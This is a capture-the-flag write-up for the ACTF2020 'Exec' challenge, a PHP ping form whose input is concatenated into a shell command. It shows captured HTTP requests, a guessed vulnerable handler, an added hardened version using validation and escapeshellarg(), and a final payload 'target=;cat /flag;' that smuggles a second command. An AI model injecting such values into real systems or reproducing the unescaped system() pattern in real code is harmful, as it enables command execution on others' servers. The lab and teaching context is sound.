[ACTF2020 Freshman Contest] Exec

Challenge link: https://buuoj.cn/challenges#[ACTF2020 新生赛]Exec

After opening the challenge, the environment looks like this.

Try entering "127.0.0.1" and capture the request.

POST / HTTP/1.1
Host: 038dc28f-5191-4958-8946-1127f62ad770.node5.buuoj.cn:81
Content-Length: 16
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://038dc28f-5191-4958-8946-1127f62ad770.node5.buuoj.cn:81
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.155 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://038dc28f-5191-4958-8946-1127f62ad770.node5.buuoj.cn:81/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive

target=127.0.0.1

Look at the response.

HTTP/1.1 200 OK
Server: openresty
Date: Tue, 22 Oct 2024 16:25:28 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.3.13
Cache-Control: no-cache
Content-Length: 960

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>command execution</title>
    <link href="http://libs.baidu.com/bootstrap/3.0.3/css/bootstrap.min.css" rel="stylesheet" />


</head>
<body>

<h1>PING</h1>
<form class="form-inline" method="post">

    <div class="input-group">
        <input style="width:280px;" id="target" type="text" class="form-control" placeholder="请输入需要ping的地址" aria-describedby="basic-addon1" name="target">
    </div>
    <br/>
    <br/>

    <button  style="width:280px;" class="btn btn-default">PING</button>


</form>
<br /><pre>
PING 127.0.0.1 (127.0.0.1): 56 data bytes
64 bytes from 127.0.0.1: seq=0 ttl=42 time=0.033 ms
64 bytes from 127.0.0.1: seq=1 ttl=42 time=0.063 ms
64 bytes from 127.0.0.1: seq=2 ttl=42 time=0.060 ms

--- 127.0.0.1 ping statistics ---
3 packets transmitted, 3 packets received, 0% packet loss
round-trip min/avg/max = 0.033/0.052/0.063 ms
</pre></body>
</html>

It can be seen that the backend apparently concatenates the user's input from the target parameter onto a ping command and executes the result as a system command. The backend code is guessed to look roughly like the following (in fact, the real source can be read through this challenge's own vulnerability: target=;cat index.php).

<?php
// Guessed backend implementation: the POST parameter is concatenated
// into the shell command string without any validation or escaping.
if (isset($_POST['target'])) {
    system("ping -c 3 " . $_POST['target']);
}
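For contrast, here is a hardened version of that handler. This is an added example, not the challenge's source and not code from the writeup author; the function names, the sample inputs and the choice to reject rather than sanitize are my assumptions. The target is validated as an IP address or hostname before any command string is built, and the accepted value is still wrapped with escapeshellarg() so the shell receives exactly one argument.

```php
<?php
// Added example, not the challenge's own code.
// Hardened form of the guessed handler: validate first, then quote.

function is_valid_ping_target(string $target): bool
{
    // Defensive: an empty value or a leading '-' could be parsed by ping
    // as an option even after quoting, so refuse it outright.
    if ($target === '' || $target[0] === '-') {
        return false;
    }
    // Accept a literal IPv4 / IPv6 address ...
    if (filter_var($target, FILTER_VALIDATE_IP) !== false) {
        return true;
    }
    // ... or a plain hostname. FILTER_FLAG_HOSTNAME only allows
    // letters, digits, '-' and '.', so ; | & ` $ ( ) and spaces are rejected.
    return filter_var($target, FILTER_VALIDATE_DOMAIN, FILTER_FLAG_HOSTNAME) !== false;
}

function build_ping_command(string $target): ?string
{
    if (!is_valid_ping_target($target)) {
        return null; // reject the request rather than trying to "clean" the input
    }
    // escapeshellarg() single-quotes the value and escapes embedded quotes,
    // so even if validation were loosened later the shell sees one argument.
    return 'ping -c 3 ' . escapeshellarg($target);
}

// Constructed inputs mirroring the writeup: the benign address is accepted,
// the injection payload is refused before a command string ever exists.
$samples = ['127.0.0.1', ';cat /flag;', 'example.com', '127.0.0.1; id'];
foreach ($samples as $s) {
    $cmd = build_ping_command($s);
    printf("%-16s => %s\n", $s, $cmd === null ? 'REJECTED' : $cmd);
}

// Web handler path: only run the command when validation passed, and
// HTML-escape the output so ping's reply cannot inject markup either.
if (PHP_SAPI !== 'cli' && isset($_POST['target'])) {
    $cmd = build_ping_command((string) $_POST['target']);
    if ($cmd === null) {
        http_response_code(400);
        echo 'invalid target';
    } else {
        echo '<pre>' . htmlspecialchars((string) shell_exec($cmd), ENT_QUOTES, 'UTF-8') . '</pre>';
    }
}
```

Run it from the command line with `php` to see the four sample values classified; `;cat /flag;` and `127.0.0.1; id` are rejected by the allow-list, which is the check that actually closes the hole. The escapeshellarg() call is a second layer, not a substitute for validation: it stops the shell from interpreting metacharacters, but it cannot stop an accepted string from being misread as an option by ping itself, which is why the leading-dash check is kept separately.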

Therefore, simply appending another command to the parameter is enough to read the flag.

POST / HTTP/1.1
Host: 038dc28f-5191-4958-8946-1127f62ad770.node5.buuoj.cn:81
Content-Length: 18
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://038dc28f-5191-4958-8946-1127f62ad770.node5.buuoj.cn:81
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.155 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://038dc28f-5191-4958-8946-1127f62ad770.node5.buuoj.cn:81/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive

target=;cat /flag;

posted @ 2024-11-01 21:46  imtaieee